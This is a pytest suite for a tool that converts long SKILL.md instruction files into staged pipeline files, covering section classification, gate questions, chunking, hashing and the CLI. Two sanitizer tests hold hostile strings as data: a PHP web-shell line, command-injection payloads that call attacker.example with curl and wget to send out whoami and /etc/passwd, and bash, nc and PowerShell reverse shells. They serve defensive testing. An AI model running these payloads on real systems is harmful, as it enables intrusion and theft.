| """ |
| tests/test_batch_convert.py -- pytest suite for the batch_convert module (micro-skills conversion pipeline). |
| |
| Covers: |
| - classify_section (scope / gate / build / deliver) |
| - extract_gate_questions (avoid / ensure / existing-question patterns) |
| - parse_sections (## header splitting) |
| - split_into_chunks (line-count enforcement) |
| - convert_skill (end-to-end: pipeline files, orchestrator size, hash, skip logic) |
| """ |
|
|
| import hashlib |
| import sys |
| from pathlib import Path |
| from textwrap import dedent |
|
|
| import pytest |
|
|
| |
| sys.path.insert(0, str(Path(__file__).parents[1])) |
|
|
| from batch_convert import ( |
| build_chunk_filename, |
| classify_section, |
| convert_skill, |
| defang_dangerous_markdown, |
| extract_gate_questions, |
| main as batch_convert_main, |
| parse_sections, |
| split_into_chunks, |
| ) |
|
|
| |
| |
| |
|
|
| def _make_skill_md(tmp_path: Path, content: str, name: str = "test-skill") -> Path: |
| """Write a SKILL.md under tmp_path/<name>/SKILL.md and return the path.""" |
| skill_dir = tmp_path / name |
| skill_dir.mkdir(parents=True, exist_ok=True) |
| skill_path = skill_dir / "SKILL.md" |
| skill_path.write_text(content, encoding="utf-8") |
| return skill_path |
|
|
|
|
| def _fake_skill_content(num_lines: int = 250) -> str: |
| """Return a realistic fake SKILL.md with exactly num_lines lines.""" |
| |
| header = dedent("""\ |
| --- |
| name: test-skill |
| description: "A synthetic skill for unit tests" |
| --- |
| |
| # test-skill |
| |
| ## Overview |
| |
| This skill teaches you to write production-grade code with proper structure. |
| It is used when you need to scaffold new modules quickly and consistently. |
| Prerequisites: familiarity with Python and basic design patterns. |
| Applies when: the request involves creating a new service, utility, or module. |
| Input: a plain-language description of the component needed. |
| Requirements: Python 3.11+, an active virtual environment, black installed. |
| |
| ## Prerequisites |
| |
| - Python 3.11 or newer installed and on $PATH. |
| - A virtual environment activated before running any commands. |
| - The `black` formatter available: `pip install black`. |
| - Constraint: do not use global state anywhere in the implementation. |
| - Precondition: repository root must contain a pyproject.toml. |
| |
| ## Steps |
| |
| Follow these instructions in order without skipping any step. |
| |
| """) |
|
|
| |
| footer = dedent("""\ |
| |
| ## Validation |
| |
| Run the following checks before marking the task complete. |
| - avoid leaving TODO comments in the output code. |
| - avoid hardcoded credentials or secrets. |
| - ensure every public function has a type-annotated signature. |
| - ensure the module imports cleanly with no circular dependencies. |
| - never commit debug print() statements. |
| - never expose internal implementation details through the public API. |
| |
| ## Output Format |
| |
| Present the output as a self-contained Python module. |
| Format the response with a file header comment, then all imports, then code. |
| Include an example usage block at the bottom of the file. |
| The final output should be ready to paste directly into the repository. |
| Summary: one sentence describing what was built and where to find it. |
| """) |
|
|
| header_lines = header.split("\n") |
| footer_lines = footer.split("\n") |
| fixed_count = len(header_lines) + len(footer_lines) |
| padding_needed = max(0, num_lines - fixed_count) |
|
|
| step_lines = [] |
| for i in range(1, padding_needed + 1): |
| step_lines.append( |
| f" Step {i}: Implement component {i} according to the design. " |
| f"Verify output matches spec." |
| ) |
|
|
| return "\n".join(header_lines + step_lines + footer_lines) |
|
|
|
|
| |
| |
| |
|
|
| class TestClassifySection: |
| def test_classify_section_scope(self): |
| """Section with 'prerequisite' and 'constraint' keywords -> scope.""" |
| header = "## Prerequisites" |
| body = dedent("""\ |
| prerequisite: Python 3.11 installed. |
| constraint: no global state. |
| before you begin, activate the virtual environment. |
| input: a plain-language description. |
| requirements: black formatter available. |
| """) |
| result = classify_section(header, body) |
| assert result == "scope", f"Expected 'scope', got {result!r}" |
|
|
| def test_classify_section_gate(self): |
| """Section dominated by 'avoid', 'ensure', 'never' keywords -> gate.""" |
| header = "## Validation Rules" |
| body = dedent("""\ |
| - avoid leaving TODO comments in final output. |
| - ensure every function is type-annotated. |
| - never expose internal details through the public API. |
| - must always verify the output compiles cleanly. |
| - do not commit debug print statements. |
| - avoid hardcoded secrets. |
| - verify the output matches the spec. |
| """) |
| result = classify_section(header, body) |
| assert result == "gate", f"Expected 'gate', got {result!r}" |
|
|
| def test_classify_section_build(self): |
| """Generic instruction section with no strong keywords -> build (default).""" |
| header = "## Implementation" |
| body = "\n".join( |
| f" Write the {i}th component of the module." |
| for i in range(1, 12) |
| ) |
| result = classify_section(header, body) |
| assert result == "build", f"Expected 'build', got {result!r}" |
|
|
| def test_classify_section_deliver(self): |
| """Section with 'output', 'format', 'present' keywords -> deliver.""" |
| header = "## Output Format" |
| body = dedent("""\ |
| Present the final result as a self-contained Python module. |
| Format the response with a file header, then imports, then code. |
| Output should be usable without modification. |
| Return a summary sentence describing what was built. |
| The report template must be filled in completely. |
| """) |
| result = classify_section(header, body) |
| assert result == "deliver", f"Expected 'deliver', got {result!r}" |
|
|
|
|
| |
| |
| |
|
|
| class TestExtractGateQuestions: |
| def test_extract_gate_questions_avoid(self): |
| """'- avoid X' converts to 'Is the output free of X? YES/NO'.""" |
| text = "- avoid leaving TODO comments in the output" |
| questions = extract_gate_questions(text) |
| assert len(questions) == 1 |
| assert questions[0] == "Is the output free of leaving TODO comments in the output? YES/NO" |
|
|
| def test_extract_gate_questions_ensure(self): |
| """'- ensure X' converts to 'Does the output X? YES/NO'.""" |
| text = "- ensure every function is type-annotated" |
| questions = extract_gate_questions(text) |
| assert len(questions) == 1 |
| assert questions[0] == "Does the output every function is type-annotated? YES/NO" |
|
|
| def test_extract_gate_questions_existing(self): |
| """Lines already ending with '?' are kept verbatim (stripped of list markers).""" |
| text = dedent("""\ |
| - Has the output been reviewed for correctness? |
| - Is every dependency pinned to a specific version? |
| """) |
| questions = extract_gate_questions(text) |
| assert "Has the output been reviewed for correctness?" in questions |
| assert "Is every dependency pinned to a specific version?" in questions |
|
|
| def test_extract_gate_questions_mixed(self): |
| """Mixed patterns all produce questions; no empty entries generated.""" |
| text = dedent("""\ |
| - avoid hardcoded credentials |
| - ensure the module imports cleanly |
| - never commit debug print statements |
| - Is the public API stable? |
| """) |
| questions = extract_gate_questions(text) |
| assert all(q.strip() for q in questions), "No empty strings should appear" |
| assert len(questions) == 4 |
|
|
| def test_extract_gate_questions_empty_text(self): |
| """Empty / whitespace-only text returns an empty list.""" |
| assert extract_gate_questions("") == [] |
| assert extract_gate_questions(" \n\n ") == [] |
|
|
|
|
| |
| |
| |
|
|
| class TestParseSections: |
| def test_parse_sections_basic(self): |
| """Correctly splits a markdown document into sections by ## headers.""" |
| content = dedent("""\ |
| ## Overview |
| This is the overview body. |
| |
| ## Steps |
| Do step 1. |
| Do step 2. |
| |
| ## Validation |
| Check everything. |
| """) |
| sections, frontmatter = parse_sections(content) |
| headers = [s["header"] for s in sections] |
| assert "## Overview" in headers |
| assert "## Steps" in headers |
| assert "## Validation" in headers |
|
|
| def test_parse_sections_returns_tuple(self): |
| """parse_sections always returns a 2-tuple (sections, frontmatter).""" |
| result = parse_sections("## Only Section\nSome body.\n") |
| assert isinstance(result, tuple) and len(result) == 2 |
|
|
| def test_parse_sections_frontmatter_stripped(self): |
| """YAML frontmatter is extracted; sections do not contain the --- delimiters.""" |
| content = dedent("""\ |
| --- |
| name: my-skill |
| description: "A test" |
| --- |
| |
| ## Body |
| Content here. |
| """) |
| sections, frontmatter = parse_sections(content) |
| assert "name: my-skill" in frontmatter |
| |
| for s in sections: |
| assert not s["header"].startswith("---") |
|
|
| def test_parse_sections_body_content(self): |
| """Section bodies contain the lines under that header.""" |
| content = "## Steps\nDo step 1.\nDo step 2.\n" |
| sections, _ = parse_sections(content) |
| assert len(sections) == 1 |
| assert "Do step 1." in sections[0]["body"] |
| assert "Do step 2." in sections[0]["body"] |
|
|
| def test_parse_sections_no_headers(self): |
| """Content with no ## headers is returned as a single body-only section.""" |
| content = "Just some text.\nNo headers here.\n" |
| sections, _ = parse_sections(content) |
| |
| assert len(sections) >= 1 |
| combined_bodies = " ".join(s["body"] for s in sections) |
| assert "Just some text." in combined_bodies |
|
|
|
|
| |
| |
| |
|
|
| class TestSplitIntoChunks: |
| def test_split_into_chunks_short_text(self): |
| """Text shorter than max_lines is returned as a single chunk.""" |
| text = "\n".join(f"line {i}" for i in range(20)) |
| chunks = split_into_chunks(text, max_lines=40) |
| assert len(chunks) == 1 |
| assert chunks[0] == text |
|
|
| def test_split_into_chunks_exact_boundary(self): |
| """Text with exactly max_lines lines is a single chunk.""" |
| text = "\n".join(f"line {i}" for i in range(40)) |
| chunks = split_into_chunks(text, max_lines=40) |
| assert len(chunks) == 1 |
|
|
| def test_split_into_chunks_long_text(self): |
| """100-line text with max_lines=40 produces multiple chunks.""" |
| |
| lines = [] |
| for i in range(1, 101): |
| lines.append(f"Instruction line {i}: do something useful here.") |
| if i % 15 == 0: |
| lines.append("") |
| text = "\n".join(lines) |
| chunks = split_into_chunks(text, max_lines=40) |
| assert len(chunks) >= 2, f"Expected multiple chunks, got {len(chunks)}" |
|
|
| def test_split_into_chunks_each_chunk_bounded(self): |
| """Every chunk must be at most max_lines + a small tolerance (paragraph alignment).""" |
| lines = [] |
| for i in range(1, 101): |
| lines.append(f"Line {i}") |
| if i % 10 == 0: |
| lines.append("") |
| text = "\n".join(lines) |
| max_lines = 40 |
| chunks = split_into_chunks(text, max_lines=max_lines) |
| for chunk in chunks: |
| chunk_line_count = len(chunk.split("\n")) |
| |
| assert chunk_line_count <= max_lines + 10, ( |
| f"Chunk has {chunk_line_count} lines, expected <= {max_lines + 10}" |
| ) |
|
|
| def test_split_into_chunks_no_content_lost(self): |
| """Joining all chunks contains all non-empty lines from the original.""" |
| text = "\n".join(f"important-line-{i}" for i in range(80)) |
| chunks = split_into_chunks(text, max_lines=30) |
| rejoined = "\n".join(chunks) |
| for i in range(80): |
| assert f"important-line-{i}" in rejoined |
|
|
| def test_build_chunk_filename_stays_filesystem_safe_after_z(self): |
| """The 27th and later build chunks must not use punctuation suffixes.""" |
| assert build_chunk_filename(0) == "03a-build.md" |
| assert build_chunk_filename(25) == "03z-build.md" |
| assert build_chunk_filename(26) == "03-027-build.md" |
| assert build_chunk_filename(30) == "03-031-build.md" |
| assert "|" not in build_chunk_filename(26) |
|
|
| def test_defang_dangerous_markdown_php_openers(self): |
| """Generated markdown should not contain raw PHP openers.""" |
| text = "<?php system($_GET['cmd']); ?>\n<?= $value ?>" |
| safe = defang_dangerous_markdown(text) |
| assert "<?php" not in safe |
| assert "<?=" not in safe |
| assert "<?php" in safe |
| assert "<?=" in safe |
|
|
| def test_defang_dangerous_markdown_command_injection_payloads(self): |
| """Generated markdown should not write executable command-injection payloads.""" |
| text = dedent("""\ |
| 127.0.0.1; curl http://attacker.example/?$(whoami) |
| 127.0.0.1 && wget https://attacker.example/$(cat /etc/passwd) |
| ; bash -i >& /dev/tcp/attacker.example/4444 0>&1 |
| ; nc -e /bin/bash attacker.example 4444 |
| echo "d2hvYW1p" | base64 -d | bash |
| & powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('x',4444)" |
| """) |
|
|
| safe = defang_dangerous_markdown(text) |
|
|
| assert "curl http://" not in safe |
| assert "wget https://" not in safe |
| assert "$(" not in safe |
| assert "bash -i" not in safe |
| assert "nc -e" not in safe |
| assert "| bash" not in safe |
| assert "powershell -nop" not in safe.lower() |
| assert "System.Net.Sockets.TCPClient" not in safe |
| assert "​" in safe |
|
|
|
|
| |
| |
| |
|
|
| class TestConvertSkill: |
| """End-to-end tests for convert_skill(). |
| |
| All tests use tmp_path so no real skill directories are touched. |
| The fake skill is always 250 lines β well above the 180-line threshold. |
| """ |
|
|
| @pytest.fixture() |
| def skill_250(self, tmp_path: Path) -> Path: |
| """250-line SKILL.md written to tmp_path/test-skill/SKILL.md.""" |
| content = _fake_skill_content(num_lines=250) |
| return _make_skill_md(tmp_path, content, name="test-skill") |
|
|
| @pytest.fixture() |
| def skill_100(self, tmp_path: Path) -> Path: |
| """100-line SKILL.md β below the 180-line threshold.""" |
| lines = ["# Short Skill\n"] + [f"Line {i}\n" for i in range(99)] |
| content = "".join(lines) |
| return _make_skill_md(tmp_path, content, name="short-skill") |
|
|
| |
|
|
| def test_convert_skill_skips_short(self, skill_100: Path): |
| """Skills with <= 180 lines are skipped without creating any pipeline files.""" |
| result = convert_skill(skill_100) |
| assert result["status"] == "skipped" |
| assert "skipped" in result["reason"].lower() or "lines" in result["reason"].lower() |
| |
| refs_dir = skill_100.parent / "references" |
| assert not refs_dir.exists() |
|
|
| def test_convert_skill_skips_exact_threshold_with_trailing_newline(self, tmp_path: Path): |
| content = "\n".join(f"Line {i}" for i in range(180)) + "\n" |
| skill = _make_skill_md(tmp_path, content, name="exact-threshold") |
|
|
| result = convert_skill(skill, line_threshold=180) |
|
|
| assert result["status"] == "skipped" |
| assert not (skill.parent / "SKILL.md.original").exists() |
|
|
| def test_convert_skill_respects_explicit_line_threshold(self, skill_100: Path): |
| result = convert_skill(skill_100, line_threshold=50) |
|
|
| assert result["status"] == "converted" |
|
|
| |
|
|
| def test_convert_skill_creates_pipeline(self, skill_250: Path, tmp_path: Path): |
| """A 250-line skill produces SKILL.md, references/01-05, check-gates.md, |
| failure-log.md, and original-hash.txt.""" |
| result = convert_skill(skill_250) |
| assert result["status"] == "converted" |
|
|
| output_dir = skill_250.parent |
|
|
| |
| assert (output_dir / "SKILL.md").exists(), "SKILL.md orchestrator missing" |
|
|
| |
| assert (output_dir / "SKILL.md.original").exists(), "SKILL.md.original missing" |
|
|
| |
| assert (output_dir / "check-gates.md").exists(), "check-gates.md missing" |
| assert (output_dir / "failure-log.md").exists(), "failure-log.md missing" |
| assert (output_dir / "original-hash.txt").exists(), "original-hash.txt missing" |
|
|
| |
| refs_dir = output_dir / "references" |
| assert refs_dir.exists(), "references/ directory missing" |
| ref_files = list(refs_dir.glob("*.md")) |
| assert len(ref_files) >= 5, ( |
| f"Expected >= 5 reference files, found {len(ref_files)}: " |
| + ", ".join(f.name for f in ref_files) |
| ) |
|
|
| def test_convert_skill_preserves_original(self, skill_250: Path): |
| """After conversion, SKILL.md.original contains the original content.""" |
| original_content = skill_250.read_text(encoding="utf-8") |
| convert_skill(skill_250) |
|
|
| original_path = skill_250.parent / "SKILL.md.original" |
| assert original_path.exists() |
| preserved = original_path.read_text(encoding="utf-8") |
| assert preserved == original_content |
|
|
| def test_convert_skill_can_convert_in_memory_without_original_backup( |
| self, |
| tmp_path: Path, |
| ): |
| """Artifact packaging can convert hydrated bodies without raw backups.""" |
| content = _fake_skill_content(250) |
| output_dir = tmp_path / "converted" |
|
|
| result = convert_skill( |
| tmp_path / "virtual" / "SKILL.md", |
| output_dir=output_dir, |
| source_content=content, |
| skill_name="remote-security-skill", |
| preserve_original=False, |
| ) |
|
|
| assert result["status"] == "converted" |
| assert (output_dir / "SKILL.md").exists() |
| assert (output_dir / "references" / "01-scope.md").exists() |
| assert not (output_dir / "SKILL.md.original").exists() |
| assert (output_dir / "original-hash.txt").read_text(encoding="utf-8").strip() == ( |
| hashlib.sha256(content.encode("utf-8")).hexdigest() |
| ) |
|
|
| def test_convert_skill_orchestrator_under_30_lines(self, skill_250: Path): |
| """The generated SKILL.md orchestrator file must be under 30 lines.""" |
| convert_skill(skill_250) |
|
|
| orchestrator = skill_250.parent / "SKILL.md" |
| assert orchestrator.exists() |
| line_count = len(orchestrator.read_text(encoding="utf-8").split("\n")) |
| assert line_count < 30, ( |
| f"SKILL.md orchestrator has {line_count} lines; expected < 30" |
| ) |
|
|
| def test_convert_skill_check_gates_has_questions(self, skill_250: Path): |
| """check-gates.md contains at least one YES/NO question.""" |
| convert_skill(skill_250) |
|
|
| gates_path = skill_250.parent / "check-gates.md" |
| gates_content = gates_path.read_text(encoding="utf-8") |
| assert "YES/NO" in gates_content, "check-gates.md has no YES/NO questions" |
| |
| question_lines = [ |
| line for line in gates_content.split("\n") |
| if line.strip() and line.strip()[0].isdigit() and "YES/NO" in line |
| ] |
| assert len(question_lines) >= 1 |
|
|
| def test_convert_skill_shards_long_non_build_stage(self, tmp_path: Path): |
| """Long scope/plan/check/deliver stages are split behind short indexes.""" |
| body = "\n".join( |
| f"- Requirement {i}: preserve this constraint exactly." |
| for i in range(220) |
| ) |
| content = dedent(f"""\ |
| --- |
| name: long-scope |
| description: "Long scope test" |
| --- |
| |
| # long-scope |
| |
| ## Requirements |
| |
| {body} |
| |
| ## Steps |
| |
| Build the requested output. |
| """) |
| skill = _make_skill_md(tmp_path, content, name="long-scope") |
| result = convert_skill(skill) |
|
|
| assert result["status"] == "converted" |
| refs = skill.parent / "references" |
| scope_index = refs / "01-scope.md" |
| scope_shards = sorted(refs.glob("01*scope.md")) |
| assert scope_index.exists() |
| assert any(p.name == "01a-scope.md" for p in scope_shards) |
| for path in scope_shards: |
| text = path.read_text(encoding="utf-8") |
| line_count = text.count("\n") + (1 if text and not text.endswith("\n") else 0) |
| assert line_count <= 40, f"{path.name} has {line_count} lines" |
|
|
| def test_convert_skill_hash_matches(self, skill_250: Path): |
| """original-hash.txt contains the SHA256 of the original file content.""" |
| original_content = skill_250.read_text(encoding="utf-8") |
| expected_hash = hashlib.sha256(original_content.encode("utf-8")).hexdigest() |
|
|
| convert_skill(skill_250) |
|
|
| hash_path = skill_250.parent / "original-hash.txt" |
| stored = hash_path.read_text(encoding="utf-8").strip() |
| assert stored == expected_hash, ( |
| f"Hash mismatch: stored={stored!r}, expected={expected_hash!r}" |
| ) |
|
|
| def test_convert_skill_returns_converted_stats(self, skill_250: Path): |
| """convert_skill returns a dict with all expected stat keys when converted.""" |
| result = convert_skill(skill_250) |
| assert result["status"] == "converted" |
| for key in ("skill", "original_lines", "pipeline_files", "gate_questions", |
| "max_file_lines", "build_splits", "reference_files"): |
| assert key in result, f"Missing key {key!r} in result" |
|
|
| def test_convert_skill_original_lines_accurate(self, skill_250: Path): |
| """Returned original_lines matches the actual line count of the source.""" |
| content = skill_250.read_text(encoding="utf-8") |
| actual_line_count = len(content.splitlines()) |
| result = convert_skill(skill_250) |
| assert result["original_lines"] == actual_line_count |
|
|
| def test_convert_skill_idempotent_on_second_call(self, skill_250: Path): |
| """Running convert_skill twice on the same directory does not crash or |
| destroy the already-preserved original.""" |
| original_content = skill_250.read_text(encoding="utf-8") |
|
|
| |
| result1 = convert_skill(skill_250) |
| assert result1["status"] == "converted" |
|
|
| |
| |
| |
| |
| original_path = skill_250.parent / "SKILL.md.original" |
| preserved = original_path.read_text(encoding="utf-8") |
| assert preserved == original_content, ( |
| "SKILL.md.original was overwritten on the second call" |
| ) |
|
|
| |
|
|
| def test_convert_skill_respects_output_dir(self, skill_250: Path, tmp_path: Path): |
| """When output_dir is supplied, pipeline files land there, not in the |
| source skill directory.""" |
| out_dir = tmp_path / "converted_output" |
| out_dir.mkdir() |
|
|
| result = convert_skill(skill_250, output_dir=out_dir) |
| assert result["status"] == "converted" |
|
|
| assert (out_dir / "SKILL.md").exists(), "SKILL.md not in output_dir" |
| assert (out_dir / "check-gates.md").exists() |
| assert (out_dir / "failure-log.md").exists() |
| assert (out_dir / "original-hash.txt").exists() |
| assert skill_250.exists() |
| refs = list((out_dir / "references").glob("*.md")) |
| assert len(refs) >= 5 |
|
|
| def test_convert_skill_accepts_string_paths(self, skill_250: Path, tmp_path: Path): |
| """wiki_orchestrator passes string paths; keep that API working.""" |
| out_dir = tmp_path / "converted_output" |
| out_dir.mkdir() |
|
|
| result = convert_skill(str(skill_250), output_dir=str(out_dir)) |
|
|
| assert result["status"] == "converted" |
| assert skill_250.exists() |
| assert (out_dir / "SKILL.md").exists() |
| assert (out_dir / "references" / "01-scope.md").exists() |
|
|
|
|
| def test_main_file_mode_respects_min_lines(tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys): |
| skill = _make_skill_md(tmp_path, _fake_skill_content(100), name="cli-threshold") |
| monkeypatch.setattr( |
| sys, |
| "argv", |
| ["batch_convert.py", "--file", str(skill), "--min-lines", "50"], |
| ) |
|
|
| batch_convert_main() |
|
|
| output = capsys.readouterr().out |
| assert '"status": "converted"' in output |
| assert (skill.parent / "SKILL.md.original").exists() |
|
|